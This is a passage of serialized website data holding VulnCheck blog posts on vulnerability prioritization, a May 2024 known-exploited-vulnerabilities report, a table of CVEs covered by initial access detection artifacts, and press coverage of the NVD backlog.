Documentation on how to use our NVD++ API can be found here:",[18,72076,72077,72078],{},"NVD++: ",[47,72079,72080],{"href":72080,"rel":72081},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fnist-nvd\u002Fnvd-2",[51],[61,72083,72085],{"id":72084},"curated-git-exploits","Curated Git Exploits",[18,72087,72088,72089],{},"VulnCheck XDB is an index of exploit proof-of-concept code in Git repositories, programmatically compiled with validation steps that involve human analysis and automated block lists to ensure the exploits are valid.\n",[47,72090,72091],{"href":72091,"rel":72092},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F",[51],[61,72094,72096],{"id":72095},"free-to-use-w-attribution","Free to Use w\u002F Attribution",[18,72098,72099,72100],{},"Leveraging VulnCheck KEV and NVD++ and the data in it, in your own production, solution, or service, is easy to do at no additional cost, but requires prominent attribution to VulnCheck.\n",[47,72101,72102],{"href":72102,"rel":72103},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fvulncheck-kev\u002Fattribution",[51],[61,72105,202],{"id":201},[18,72107,205],{},[18,72109,208],{},[18,72111,211,72112,217],{},[47,72113,216],{"href":214,"rel":72114},[51],{"title":219,"searchDepth":220,"depth":220,"links":72116},[72117,72118,72119,72120,72121,72122],{"id":72048,"depth":220,"text":72049},{"id":72059,"depth":220,"text":72060},{"id":72070,"depth":220,"text":72071},{"id":72084,"depth":220,"text":72085},{"id":72095,"depth":220,"text":72096},{"id":201,"depth":220,"text":202},"VulnCheck Community delivers timely and valuable vulnerability intelligence at machine 
speeds",{"slug":72125},"top-5-reasons-to-use-vulncheck-community","\u002Fblog\u002Ftop-5-reasons-to-use-vulncheck-community",{"title":72035,"description":72123},"blog\u002Ftop-5-reasons-to-use-vulncheck-community",[33173],"WQWwCDGIgmx7fYQXal8LE_VnyLRUDdVieewRhXfwB1M",{"id":72132,"title":66054,"articles":7,"authors":72133,"body":72135,"date":71953,"description":72152,"extension":234,"image":7,"link":7,"meta":72322,"navigation":237,"path":72324,"seo":72325,"series":7,"stem":72326,"subtype":7,"tags":7,"__hash__":72327},"blog\u002Fblog\u002Fvulnerability-prioritization.md",[72134],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72136,"toc":72317},[72137,72141,72144,72147,72150,72153,72157,72161,72164,72167,72175,72178,72182,72185,72195,72198,72202,72206,72209,72216,72220,72223,72228,72231,72238,72242,72245,72248,72271,72275,72278,72281,72289,72293,72296,72306,72308,72310,72312],[18,72138,72139],{},[68,72140],{":width":10862,"alt":68102,"src":68103},[18,72142,72143],{},"According to the Verizon DBIR, vulnerability exploitation in breaches is up 180% from last year. More unfortunate news for defenders? One of the most significant challenges security teams face today is knowing which vulnerabilities to prioritize.",[18,72145,72146],{},"Security practitioners have long struggled to make informed decisions due to limited exploit evidence and threat context. Having the right threat context is critical for driving effective remediation outcomes, especially with limited resources.",[18,72148,72149],{},"At VulnCheck, we deliver the necessary threat context and intelligence teams need to make smarter, faster and better informed decisions about which vulnerabilities to remediate first.",[18,72151,72152],{},"To help security practitioners prioritize vulnerabilities using exploit evidence, we've outlined key considerations and strategies in this blog. 
Alongside exploit intelligence, it’s crucial to incorporate environmental and asset context using decision-based frameworks such as Stakeholder-Specific Vulnerability Categorization.",[1920,72154,72156],{"id":72155},"what-exploit-evidence-should-be-prioritized-first","What Exploit Evidence Should Be Prioritized First?",[61,72158,72160],{"id":72159},"known-exploited-vulnerabilities-kev","Known Exploited Vulnerabilities (KEV)",[18,72162,72163],{},"A Known Exploited Vulnerability is one with confirmed exploitation evidence. Depending on the asset context, these should be treated with urgency and remediated as soon as possible.",[18,72165,72166],{},"The importance of remediating Known Exploited Vulnerabilities is underscored by CISA’s BOD 22-01, which mandates that federal agencies address such vulnerabilities. CISA states, “Known exploited vulnerabilities should be the top priority for remediation.”",[18,72168,72169,72170,72174],{},"In our ",[47,72171,57777],{"href":72172,"rel":72173},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-are-known-to-be-exploited-in-the-wild",[51]," published in May, we observed that 1.1% of vulnerabilities over the past decade are known to be exploited in the wild.",[18,72176,72177],{},"If you’re looking for insight beyond CISA’s KEV, the VulnCheck KEV is a community resource that offers organizations expanded visibility into more than 2,500 known exploited vulnerabilities. That’s a 130% increase over CISA’s KEV catalog, with data from hundreds of sources worldwide.",[1920,72179,72181],{"id":72180},"what-evidence-can-be-used-to-further-prioritize-known-exploited-vulnerabilities","What Evidence Can Be Used to Further Prioritize Known Exploited Vulnerabilities?",[18,72183,72184],{},"Additional evidence can help determine the prioritization of a known exploited vulnerability. 
Organizations may consider:",[22,72186,72187,72190,72193],{},[25,72188,72189],{},"Ransomware: Vulnerabilities used in ransomware campaigns are often prioritized due to their widespread impact.",[25,72191,72192],{},"Botnets: Vulnerabilities exploited by botnets, collections of infected computers controlled by a common attacker, are critical to address.",[25,72194,60554],{},[18,72196,72197],{},"It’s also critical to take immediate action when a known exploited vulnerability is exposed on the internet.",[1920,72199,72201],{"id":72200},"what-vulnerabilities-should-be-considered-after-known-exploited-vulnerabilities","What Vulnerabilities Should Be Considered After Known Exploited Vulnerabilities?",[61,72203,72205],{"id":72204},"weaponized-vulnerabilities","Weaponized Vulnerabilities",[18,72207,72208],{},"Weaponized vulnerabilities are those with explicit malicious intent or reported exploitation. These include exploits within malware or those facilitating easy exploitation (projects such as Metasploit, VulnCheck IAI, CANVAS, and Core Impact). Weaponized exploits often have secondary payloads, droppers, or implants.",[18,72210,72169,72211,72215],{},[47,72212,57777],{"href":72213,"rel":72214},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-are-known-to-be-weaponized",[51]," published in May, we observed that 2% of vulnerabilities over the past decade had been weaponized.",[1920,72217,72219],{"id":72218},"how-does-exploit-code-availability-factor-into-prioritization","How Does Exploit Code Availability Factor into Prioritization?",[18,72221,72222],{},"Proof of Concept (POC) exploit code demonstrates exploitation and indicates risk. POC exploits, such as blog posts, curl requests, or Python scripts, are often used in real-world attacks. 
The number of POC exploits associated with a vulnerability correlates with its likelihood of being weaponized or exploited.",[18,72224,72225],{},[68,72226],{":width":10862,"alt":68102,"src":72227},"\u002Fblog\u002Fvulnerability-prioritization\u002Fexploitation-mapped-to-exploit-counts.png",[18,72229,72230],{},"Another consideration when using POC exploits for vulnerability prioritization is validating that the POCs are actually real POCs. It’s not uncommon for code to be posted claiming to be an exploit when, in fact, the code does not contain an exploit or, even worse, it contains malware. VulnCheck validates POC exploits to ensure they are legitimate.",[18,72232,72169,72233,72237],{},[47,72234,57777],{"href":72235,"rel":72236},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-have-a-publicly-available-proof-of-concept-exploit",[51]," published in May, we observed that 31% of vulnerabilities over the past decade have proof-of-concept exploit code.",[1920,72239,72241],{"id":72240},"what-other-considerations-should-i-use-when-prioritizing-vulnerability-remediation","What Other Considerations Should I Use When Prioritizing Vulnerability Remediation?",[18,72243,72244],{},"While this post primarily focuses on prioritizing vulnerabilities based on evidence of exploitation, there are additional factors to consider. Incorporating these factors within decision-based frameworks like Stakeholder-Specific Vulnerability Categorization (SSVC) can provide a more comprehensive approach.\nOften, vulnerability attributes beyond threat intelligence can help provide further visibility into the risk a vulnerability might pose. 
Attributes such as CVSS metrics, CAPEC, CWE, MITRE ATT&CK, threat actors, targeted industries, targeted countries, and categorizations are frequently used by VulnCheck customers to determine the risk a vulnerability poses within their environment.",[18,72246,72247],{},"Beyond exploitation evidence, consider asking the following questions:",[22,72249,72250,72253,72256,72259,72262,72265,72268],{},[25,72251,72252],{},"Is the device\u002Fapplication connected to the internet?",[25,72254,72255],{},"Is the device\u002Fapplication used for initial access?",[25,72257,72258],{},"Is the device\u002Fapplication controlled by a user and susceptible to phishing attacks?",[25,72260,72261],{},"Is the vulnerability remotely exploitable?",[25,72263,72264],{},"Is the vulnerability automatable?",[25,72266,72267],{},"Is the vulnerability reachable?",[25,72269,72270],{},"Are there mitigations in place for the vulnerability?",[1920,72272,72274],{"id":72273},"when-should-i-use-a-scoring-system-such-as-cvss-or-epss","When Should I Use a Scoring System such as CVSS or EPSS?",[18,72276,72277],{},"VulnCheck provides CVSS and EPSS scoring systems as data points for decision-making.",[18,72279,72280],{},"There are important considerations:",[22,72282,72283,72286],{},[25,72284,72285],{},"CVSS: Base scores do not account for exploitation evidence without enrichment (CVSS-BT). Organizations required to use CVSS should enrich scores with exploit intelligence and environmental context. VulnCheck provides automated CVSS-BT enrichment. Organizations that are in highly regulated industries often opt to use CVSS-BT and are required to use CVSS scoring.",[25,72287,72288],{},"EPSS: The Exploit Prediction Scoring System predicts the likelihood of exploitation within the next 30 days. 
While helpful in identifying vulnerabilities that could pose a threat to an organization, the score lacks any context and often overlooks known exploitation, weaponized vulnerabilities and vulnerabilities with high exploit counts. EPSS should be used as a supplementary data point for longer-tail prioritization after addressing higher-risk vulnerabilities such as known exploitation, weaponization and vulnerabilities with higher exploit counts. If you plan to use EPSS with a decision-based framework such as SSVC, you can also consider defining thresholds within your prioritization schema.",[1920,72290,72292],{"id":72291},"taking-the-next-steps-in-evidence-based-prioritization","Taking The Next Steps in Evidence-Based Prioritization",[18,72294,72295],{},"Prioritizing vulnerabilities effectively requires a comprehensive approach that integrates exploit evidence, environmental context, and additional risk factors. By utilizing threat intelligence and vulnerability attributes, organizations can make informed decisions in prioritizing vulnerabilities and reducing an organization's overall risk.",[18,72297,72298,72299,982,72302,72305],{},"At VulnCheck, we provide the tools and intelligence necessary to navigate the complex landscape of vulnerability management. 
Our resources, such as the ",[47,72300,1233],{"href":2871,"rel":72301},[51],[47,72303,216],{"href":214,"rel":72304},[51],", empower security practitioners to prioritize and remediate vulnerabilities effectively.",[61,72307,202],{"id":201},[18,72309,205],{},[18,72311,208],{},[18,72313,211,72314,217],{},[47,72315,216],{"href":214,"rel":72316},[51],{"title":219,"searchDepth":220,"depth":220,"links":72318},[72319,72320,72321],{"id":72159,"depth":220,"text":72160},{"id":72204,"depth":220,"text":72205},{"id":201,"depth":220,"text":202},{"slug":72323},"vulnerability-prioritization","\u002Fblog\u002Fvulnerability-prioritization",{"title":66054,"description":72152},"blog\u002Fvulnerability-prioritization","yTJC9gXMBW4mP9NEvpm5IPZ8gsnCvtKfpAhYJLEIiyQ",{"id":72329,"title":72330,"articles":7,"authors":72331,"body":72333,"date":71816,"description":72514,"extension":234,"image":7,"link":7,"meta":72515,"navigation":237,"path":72517,"seo":72518,"series":7,"stem":72519,"subtype":7,"tags":72520,"__hash__":72521},"blog\u002Fblog\u002Fkev-report-may-2024.md","VulnCheck Exploited Vulnerabilities Report - May 2024",[72332],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72334,"toc":72511},[72335,72338,72340,72357,72361,72366,72369,72392,72395,72399,72405,72432,72434,72439,72442,72467,72470,72472,72477,72480,72484,72487,72489,72500,72502,72504,72506],[18,72336,72337],{},"In May, VulnCheck identified evidence of 103 CVEs that were publicly disclosed for the first time as exploited in the wild, marking a 90.7% increase over April. 
This growth in public disclosure aligns with the rising trend in vulnerability exploitation, as highlighted by Verizon’s 2024 Data Breach Investigations Report (DBIR), which reported a massive 180% increase in vulnerability exploitation between 2022 and 2023.",[1920,72339,20],{"id":3520},[22,72341,72342,72345,72348,72351,72354],{},[25,72343,72344],{},"In May, VulnCheck identified 103 CVEs that were publicly disclosed for the first time as exploited in the wild - a 90%+ increase since April.",[25,72346,72347],{},"Software that topped the list with new exploitation evidence includes Google Chrome, Microsoft Windows, Apple Safari and Adobe Acrobat Reader.",[25,72349,72350],{},"New Exploitation Evidence sourced from Fortinet, CheckPoint, Aqua Security reports contributed to May’s spike in known exploited vulnerabilities.",[25,72352,72353],{},"VulnCheck sourced known exploitation evidence faster than CISA for 71.4% of vulnerabilities from alternate sources in May.",[25,72355,72356],{},"As of May 31st, 10 Known Exploited Vulnerabilities are still awaiting analysis by NIST NVD.",[1920,72358,72360],{"id":72359},"may-vendor-and-product-breakdown","May Vendor and Product Breakdown",[18,72362,72363],{},[68,72364],{":width":10862,"alt":58618,"src":72365},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-may-vendors.png",[18,72367,72368],{},"The 103 CVEs with known exploitation evidence were associated with 58 software suppliers across 73 unique products. 
The following software topped the list with two or more CVEs with known exploitation:",[22,72370,72371,72374,72377,72380,72383,72386,72389],{},[25,72372,72373],{},"Google Chrome: 7",[25,72375,72376],{},"Microsoft Windows: 5",[25,72378,72379],{},"Apple Safari: 5",[25,72381,72382],{},"Adobe Acrobat Reader: 3",[25,72384,72385],{},"Microsoft Exchange: 2",[25,72387,72388],{},"Oracle JDK: 2",[25,72390,72391],{},"phpMyAdmin: 2",[18,72393,72394],{},"TP-Link’s TL-R600VPN (2) is new to the VulnCheck Known Exploited Vulnerabilities (KEV), and Arcserve Unified Data Protection (3) has its first newly confirmed exploited vulnerabilities since early 2022.",[1920,72396,72398],{"id":72397},"significant-increase-in-vulnerability-exploitation-disclosure","Significant Increase in Vulnerability Exploitation Disclosure",[18,72400,72401,72404],{},[68,72402],{":width":10862,"alt":58618,"src":72403},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-increase.png","\nInvestigating the substantial increase in new vulnerability exploitation disclosures, we observe a significant spike from previous months.\nVulnCheck KEV has been in existence since January 2021 and prior to May, the only significant spikes in VulnCheck KEV data were:",[22,72406,72407,72416,72423],{},[25,72408,72409,72410,72415],{},"In April of 2021, Palo Alto’s Unit 42 ",[47,72411,72414],{"href":72412,"rel":72413,":target":10881},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fnetwork-attack-trends-winter-2020\u002F",[51],"published a report"," including 2020’s top exploited vulnerabilities.",[25,72417,72418,72419,72422],{},"Late 2021, the Cybersecurity and Infrastructure Security Agency (CISA) launched ",[47,72420,31643],{"href":2864,"rel":72421,":target":10881},[51]," resulting in a spike in November 2021 and March 2022.",[25,72424,72425,72426,72431],{},"Late 2023\u002FEarly 2024 onboarding 
",[47,72427,72430],{"href":72428,"rel":72429,":target":10881},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmonitoring\u002F?category=monitoring&statistic=unique_ips&limit=100",[51],"ShadowServer"," as a new source for known exploitation.",[1920,72433,66500],{"id":66499},[18,72435,72436],{},[68,72437],{":width":10862,"alt":58618,"src":72438},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-may-source.png",[18,72440,72441],{},"To understand the increase in the disclosure of known exploited vulnerabilities, we examined the reference sources provided with VulnCheck KEV. Three sources account for 49 unique vulnerabilities:",[22,72443,72444,72452,72460],{},[25,72445,72446,72451],{},[47,72447,72450],{"href":72448,"rel":72449,":target":10881},"https:\u002F\u002Fwww.fortinet.com\u002Fcontent\u002Fdam\u002Ffortinet\u002Fassets\u002Fthreat-reports\u002Fthreat-landscape-report-2h-2023.pdf",[51],"Fortinet’s 2H-2023 Global Threat Landscape Report",": 26 new KEVs",[25,72453,72454,72459],{},[47,72455,72458],{"href":72456,"rel":72457,":target":10881},"https:\u002F\u002Fblog.checkpoint.com\u002Fsecurity\u002Fapril-2024s-most-wanted-malware-surge-in-androxgh0st-attacks-and-the-decline-of-lockbit3\u002F",[51],"CheckPoint’s April 2024’s Most Wanted Malware Blog Post",": 14 new KEVs",[25,72461,72462,72466],{},[47,72463,72465],{"href":10518,"rel":72464,":target":10881},[51],"Aqua Security’s Kinsing Demystified Guide",": 9 KEVs",[18,72468,72469],{},"While this spike might align with seasonal trends and the RSA conference, it also demonstrates security vendors’ willingness to share broader vulnerability intelligence on known exploitation. 
This transparency is a significant positive for security teams, as it enhances their visibility into known exploitation.",[1920,72471,66519],{"id":66518},[18,72473,72474],{},[68,72475],{":width":10862,"alt":66524,"src":72476},"\u002Fblog\u002Fkev-report-may-2024\u002Fcisa-kev.png",[18,72478,72479],{},"In May 2024, CISA added 14 vulnerabilities to its KEV, representing 13.6% of the vulnerabilities that VulnCheck discovered as having public exploitation evidence for the first time. VulnCheck sourced known exploitation evidence faster than CISA for 71.4% of these vulnerabilities from alternate sources.",[1920,72481,72483],{"id":72482},"exploited-vulnerabilities-continue-to-go-unprocessed-by-nist-nvd","Exploited Vulnerabilities Continue to go unprocessed by NIST NVD",[18,72485,72486],{},"In May, 22 out of 103 vulnerabilities added to VulnCheck KEV were published after February 12, 2024, when the NIST National Vulnerability Database (NVD) slowed down processing new vulnerabilities. Of these 22 known exploited vulnerabilities, 45% (10) were still awaiting analysis by NIST NVD as of May 31st.",[1920,72488,64665],{"id":64664},[18,72490,64668,72491,64672,72494,982,72497,59],{},[47,72492,28667],{"href":40745,"rel":72493},[51],[47,72495,1233],{"href":2871,"rel":72496},[51],[47,72498,40672],{"href":40670,"rel":72499},[51],[61,72501,202],{"id":201},[18,72503,205],{},[18,72505,208],{},[18,72507,211,72508,217],{},[47,72509,216],{"href":214,"rel":72510},[51],{"title":219,"searchDepth":220,"depth":220,"links":72512},[72513],{"id":201,"depth":220,"text":202},"In May, VulnCheck identified evidence of 103 CVEs that were publicly disclosed for the first time as exploited in the wild, marking a 90.7% increase over 
April.",{"slug":72516},"kev-report-may-2024","\u002Fblog\u002Fkev-report-may-2024",{"title":72330,"description":72514},"blog\u002Fkev-report-may-2024",[1279],"IG-C0WhFisbVYQx-QJUPcMw_YrboHwAy9I_opMiEG3w",{"id":72523,"title":72524,"articles":7,"authors":72525,"body":72527,"date":73049,"description":72533,"extension":234,"image":7,"link":7,"meta":73050,"navigation":237,"path":73052,"seo":73053,"series":7,"stem":73054,"subtype":7,"tags":73055,"__hash__":73056},"blog\u002Fblog\u002Finitial-access-intelligence-may-2024.md","VulnCheck Initial Access Intelligence Update - May 2024",[72526],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72528,"toc":73045},[72529,72531,72534,72540,72543,72559,72563,73038,73040],[18,72530,68846],{},[18,72532,72533],{},"In May 2024, we developed new Initial Access Intelligence (IAI) artifacts for 20 CVEs, covering 16 different vendors and 18 different products.",[18,72535,72536],{},[68,72537],{":width":10862,"alt":72538,"src":72539},"Initial Access Intelligence - May 2024","\u002Fblog\u002Finitial-access-intelligence-may-2024\u002Fvulncheck-initial-access.png",[18,72541,72542],{},"To provide better visibility into these updates, we’ve broken down May’s Initial Access Intelligence Artifacts by CVE. 
For each CVE, we provide a range of detection tools including:",[22,72544,72545,72547,72549,72551,72553,72555,72557],{},[25,72546,325],{},[25,72548,59440],{},[25,72550,59443],{},[25,72552,59446],{},[25,72554,59449],{},[25,72556,59452],{},[25,72558,64745],{},[61,72560,72562],{"id":72561},"may-2024-initial-access-artifacts","May 2024 Initial Access Artifacts",[307,72564,72565,72587],{},[310,72566,72567],{},[313,72568,72569,72571,72573,72575,72577,72579,72581,72583,72585],{},[316,72570,59471],{},[316,72572,59474],{},[316,72574,319],{},[316,72576,59479],{},[316,72578,59482],{},[316,72580,59485],{},[316,72582,59488],{},[316,72584,61654],{},[316,72586,61657],{},[336,72588,72589,72612,72635,72657,72679,72702,72725,72747,72770,72792,72814,72836,72859,72880,72903,72925,72948,72970,72993,73016],{},[313,72590,72591,72594,72597,72600,72602,72604,72606,72608,72610],{},[341,72592,72593],{},"Nexus Repository Manager Path Traversal",[341,72595,72596],{},"2024-05-31",[341,72598,72599],{},"CVE-2024-4956",[341,72601,59510],{},[341,72603,59510],{},[341,72605,59510],{},[341,72607,59510],{},[341,72609,59510],{},[341,72611],{},[313,72613,72614,72617,72620,72623,72625,72627,72629,72631,72633],{},[341,72615,72616],{},"Netis MW5360 Password Command Injection",[341,72618,72619],{},"2024-05-30",[341,72621,72622],{},"CVE-2024-22729",[341,72624,59510],{},[341,72626,59510],{},[341,72628,59510],{},[341,72630,59510],{},[341,72632,59510],{},[341,72634],{},[313,72636,72637,72640,72642,72645,72647,72649,72651,72653,72655],{},[341,72638,72639],{},"Rejetto HFS 2.3m RCE",[341,72641,72619],{},[341,72643,72644],{},"CVE-2024-23692",[341,72646,59510],{},[341,72648,59510],{},[341,72650,59510],{},[341,72652,59510],{},[341,72654,59510],{},[341,72656],{},[313,72658,72659,72662,72664,72667,72669,72671,72673,72675,72677],{},[341,72660,72661],{},"Netis SOHO Admin Credential 
Leak",[341,72663,72619],{},[341,72665,72666],{},"CVE-2024-23693",[341,72668,59510],{},[341,72670],{},[341,72672,59510],{},[341,72674,59510],{},[341,72676,59510],{},[341,72678],{},[313,72680,72681,72684,72687,72690,72692,72694,72696,72698,72700],{},[341,72682,72683],{},"Telesquare TLR-2005Ksh sysCommand RCE",[341,72685,72686],{},"2024-05-29",[341,72688,72689],{},"CVE-2024-29269",[341,72691],{},[341,72693,59510],{},[341,72695,59510],{},[341,72697,59510],{},[341,72699,59510],{},[341,72701],{},[313,72703,72704,72707,72710,72713,72715,72717,72719,72721,72723],{},[341,72705,72706],{},"Cisco RV Series Upload Symlink Traverse RCE",[341,72708,72709],{},"2024-05-24",[341,72711,72712],{},"CVE-2024-23691",[341,72714,59510],{},[341,72716,59510],{},[341,72718,59510],{},[341,72720,59510],{},[341,72722,59510],{},[341,72724],{},[313,72726,72727,72730,72732,72735,72737,72739,72741,72743,72745],{},[341,72728,72729],{},"Bricks Builder WordPress RCE",[341,72731,72709],{},[341,72733,72734],{},"CVE-2024-25600",[341,72736,59510],{},[341,72738,59510],{},[341,72740,59510],{},[341,72742,59510],{},[341,72744,59510],{},[341,72746],{},[313,72748,72749,72752,72755,72758,72760,72762,72764,72766,72768],{},[341,72750,72751],{},"nostromo (nhttpd) Path Traversal RCE",[341,72753,72754],{},"2024-05-21",[341,72756,72757],{},"CVE-2019-16278",[341,72759,59510],{},[341,72761,59510],{},[341,72763,59510],{},[341,72765],{},[341,72767],{},[341,72769],{},[313,72771,72772,72775,72777,72780,72782,72784,72786,72788,72790],{},[341,72773,72774],{},"Struts Path Traversal 
RCE",[341,72776,72754],{},[341,72778,72779],{},"CVE-2023-50164",[341,72781,59510],{},[341,72783,59510],{},[341,72785,59510],{},[341,72787],{},[341,72789],{},[341,72791],{},[313,72793,72794,72796,72799,72802,72804,72806,72808,72810,72812],{},[341,72795,61848],{},[341,72797,72798],{},"2024-05-17",[341,72800,72801],{},"CVE-2023-6549",[341,72803,59510],{},[341,72805],{},[341,72807,59510],{},[341,72809,59510],{},[341,72811,59510],{},[341,72813],{},[313,72815,72816,72819,72821,72824,72826,72828,72830,72832,72834],{},[341,72817,72818],{},"Cacti cmd_realtime.php RCE Attempt",[341,72820,72798],{},[341,72822,72823],{},"CVE-2024-29895",[341,72825],{},[341,72827],{},[341,72829,59510],{},[341,72831,59510],{},[341,72833,59510],{},[341,72835,59510],{},[313,72837,72838,72841,72844,72847,72849,72851,72853,72855,72857],{},[341,72839,72840],{},"pgAdmin Validate Binary Injection",[341,72842,72843],{},"2024-05-15",[341,72845,72846],{},"CVE-2022-4223",[341,72848,59510],{},[341,72850,59510],{},[341,72852,59510],{},[341,72854,59510],{},[341,72856,59510],{},[341,72858],{},[313,72860,72861,72863,72866,72868,72870,72872,72874,72876,72878],{},[341,72862,61779],{},[341,72864,72865],{},"2024-05-14",[341,72867,31440],{},[341,72869,59510],{},[341,72871,59510],{},[341,72873,59510],{},[341,72875,59510],{},[341,72877,59510],{},[341,72879,59510],{},[313,72881,72882,72885,72888,72891,72893,72895,72897,72899,72901],{},[341,72883,72884],{},"Tinyproxy UAF",[341,72886,72887],{},"2024-05-13",[341,72889,72890],{},"CVE-2023-49606",[341,72892],{},[341,72894,59510],{},[341,72896,59510],{},[341,72898,59510],{},[341,72900,59510],{},[341,72902],{},[313,72904,72905,72908,72910,72913,72915,72917,72919,72921,72923],{},[341,72906,72907],{},"OpenMetadata JWT Bypass 
RCE",[341,72909,72887],{},[341,72911,72912],{},"CVE-2024-28255",[341,72914,59510],{},[341,72916,59510],{},[341,72918,59510],{},[341,72920,59510],{},[341,72922,59510],{},[341,72924],{},[313,72926,72927,72930,72933,72936,72938,72940,72942,72944,72946],{},[341,72928,72929],{},"D-Link NAS Hard-Coded Credentials",[341,72931,72932],{},"2024-05-05",[341,72934,72935],{},"CVE-2024-3272",[341,72937,59510],{},[341,72939],{},[341,72941,59510],{},[341,72943],{},[341,72945],{},[341,72947],{},[313,72949,72950,72953,72955,72958,72960,72962,72964,72966,72968],{},[341,72951,72952],{},"D-Link NAS Command Injection",[341,72954,72932],{},[341,72956,72957],{},"CVE-2024-3273",[341,72959,59510],{},[341,72961],{},[341,72963,59510],{},[341,72965,59510],{},[341,72967,59510],{},[341,72969],{},[313,72971,72972,72975,72978,72981,72983,72985,72987,72989,72991],{},[341,72973,72974],{},"Netgear VPN Configuration Backup RCE",[341,72976,72977],{},"2024-05-03",[341,72979,72980],{},"CVE-2024-23690",[341,72982,59510],{},[341,72984,59510],{},[341,72986,59510],{},[341,72988,59510],{},[341,72990,59510],{},[341,72992],{},[313,72994,72995,72998,73001,73004,73006,73008,73010,73012,73014],{},[341,72996,72997],{},"Apache Tomcat WebDAV Webshell Upload",[341,72999,73000],{},"2024-05-01",[341,73002,73003],{},"CVE-2017-12617",[341,73005,59510],{},[341,73007,59510],{},[341,73009,59510],{},[341,73011,59510],{},[341,73013,59510],{},[341,73015],{},[313,73017,73018,73021,73023,73026,73028,73030,73032,73034,73036],{},[341,73019,73020],{},"Apache Tomcat 'Ghostcat' File 
Leak",[341,73022,73000],{},[341,73024,73025],{},"CVE-2020-1938",[341,73027,59510],{},[341,73029,59510],{},[341,73031,59510],{},[341,73033,59510],{},[341,73035,59510],{},[341,73037],{},[61,73039,59851],{"id":59850},[18,73041,59854,73042],{},[47,73043,59857],{"href":59857,"rel":73044},[51],{"title":219,"searchDepth":220,"depth":220,"links":73046},[73047,73048],{"id":72561,"depth":220,"text":72562},{"id":59850,"depth":220,"text":59851},"2024-06-07",{"slug":73051},"initial-access-intelligence-may-2024","\u002Fblog\u002Finitial-access-intelligence-may-2024",{"title":72524,"description":72533},"blog\u002Finitial-access-intelligence-may-2024",[1281],"4CA5VSvVxT2e5zgiAwfJADi4l1PCmZo1XoKIMXX6Mz8",{"id":73058,"title":65394,"articles":73059,"authors":73141,"body":73143,"date":73063,"description":73307,"extension":234,"image":7,"link":7,"meta":73308,"navigation":237,"path":73310,"seo":73311,"series":7,"stem":73312,"subtype":7,"tags":73313,"__hash__":73314},"blog\u002Fblog\u002Fnvd-backlog-exploitation.md",[73060,73064,73067,73070,73075,73079,73082,73086,73089,73092,73095,73098,73101,73105,73108,73111,73114,73119,73123,73127,73130,73134,73138],{"title":73061,"source":57680,"link":73062,"date":73063},"NVD Leaves Exploited Vulnerabilities Unchecked","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fnvd-exploited-vulnerabilities\u002F","2024-05-23",{"title":73065,"source":12162,"link":73066,"date":73063},"93% of vulnerabilities unanalyzed by NVD since February","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366586172\u002F93-of-vulnerabilities-unanalyzed-by-NVD-since-February",{"title":73068,"source":65365,"link":73069,"date":72709},"Amid funding cuts, backlog of unanalyzed vulnerabilities in gov't database is growing","https:\u002F\u002Ftherecord.media\u002Fnist-database-backlog-growing-vulncheck",{"title":73071,"source":73072,"link":73073,"date":73074},"Cybersecurity News: Arc browser sabotaged, Cencora pharma breach, Albany County 
breach","CISO Series","https:\u002F\u002Fcisoseries.com\u002Fcybersecurity-news-arc-browser-sabotaged-cencora-pharma-breach-albany-county-breach\u002F","2024-05-27",{"title":73076,"source":10841,"link":73077,"date":73078},"Critical CVEs are going under-analyzed as NIST falls behind","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fnist-cve-analysis-gap\u002F717226\u002F","2024-05-28",{"title":73080,"source":11233,"link":73081,"date":73078},"NVD cutbacks hamper NIST’s vulnerability analysis","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fnvd-cutbacks-hamper-nists-vulnerability-analysis",{"title":73083,"source":73084,"link":73085,"date":72686},"Report: Vulnerability analysis backlog spurred by NIST database slowdown results in significant information shortage","Inside Cybersecurity","https:\u002F\u002Finsidecybersecurity.com\u002Fdaily-news\u002Freport-vulnerability-analysis-backlog-spurred-nist-database-slowdown-results-significant",{"title":73087,"source":23286,"link":73088,"date":72686},"NIST Struggles with NVD Backlog as 93% of Flaws Remain Unanalyzed","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F05\u002Fnist-struggles-with-nvd-backlog-as-93-of-flaws-remain-unanalyzed\u002F",{"title":73090,"source":65365,"link":73091,"date":72686},"NIST expects to clear backlog in vulnerabilities database by end of fiscal year","https:\u002F\u002Ftherecord.media\u002Fnist-nvd-backlog-clear-end-fiscal-2024",{"title":73093,"source":14378,"link":73094,"date":72619},"NIST Getting Outside Help for National Vulnerability Database","https:\u002F\u002Fwww.securityweek.com\u002Fnist-getting-outside-help-for-national-vulnerability-database\u002F",{"title":73096,"source":2950,"link":73097,"date":72619},"Turf wars? 
